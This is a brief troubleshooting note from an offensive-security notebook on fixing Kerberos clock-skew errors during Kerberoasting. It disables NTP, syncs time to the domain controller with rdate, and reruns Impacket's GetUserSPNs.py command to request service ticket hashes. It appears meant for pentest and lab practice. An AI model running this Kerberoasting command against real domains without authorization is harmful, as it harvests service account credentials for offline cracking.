> For the complete documentation index, see [llms.txt](https://tamagosecurity.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://tamagosecurity.gitbook.io/notes/windows/clock-skew-too-great.md).

# Clock Skew Too Great

## 🛠 Fixing “Kerberos SessionError: KRB\_AP\_ERR\_SKEW (Clock skew too great)” During Kerberoasting

If you encounter the **KRB\_AP\_ERR\_SKEW** error while attempting Kerberoasting (usually due to time differences between your machine and the target Domain Controller), follow these steps:

{% stepper %}
{% step %}

### Switch to root (if not already)

```bash
su
```

{% endstep %}

{% step %}

### Disable automatic time sync (NTP)

```bash
timedatectl set-ntp off
```

{% endstep %}

{% step %}

### Manually sync your system time with the target machine

```bash
rdate -n [Target_IP]
```

{% endstep %}

{% step %}

### Rerun your Kerberoasting command

Example:

```bash
python3 GetUserSPNs.py [domain].local/[username]:[password] -dc-ip [DC_IP] -request
```

{% endstep %}
{% endstepper %}

{% hint style="info" %}
Note:

* Make sure `rdate` is installed (`apt install rdate` if missing).
* Use the Domain Controller’s IP as the target for `rdate`.
  {% endhint %}

✅ Once your time is synced correctly, the clock skew error should no longer occur.
